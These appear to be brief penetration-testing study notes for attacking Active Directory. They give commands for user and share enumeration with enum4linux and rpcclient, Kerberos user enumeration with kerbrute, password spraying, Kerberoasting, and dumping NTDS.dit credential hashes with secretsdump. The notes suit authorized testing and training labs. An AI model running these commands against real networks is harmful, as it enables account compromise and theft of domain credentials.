Active Directory

Attack Workflow

Determine what ports are open

Enumerate with


Used to enumerate a huge amount of AD information from the command line.

enum4linux -a        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U    # Use stolen creds to enumerate all users
enum4linux -S        # Attempt to gather SMB shares


Used to enumerate information about system over RPC

Gather a list of accounts with rpcclient and save

rpcclient -U 'GOBLINS\printerldap%SecurePassword1' -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt

Password Spraying

Using a tool such as Talon can run password spray attacks across an AD env


Kerbrute, used to run various kerberos attacks. Written in Go.

./kerbrute_linux_amd64 userenum --dc -d spookysec.local ../userlist.txt


Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.


Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.

impacket-secretsdump -just-dc backup:backup2517860@

Last updated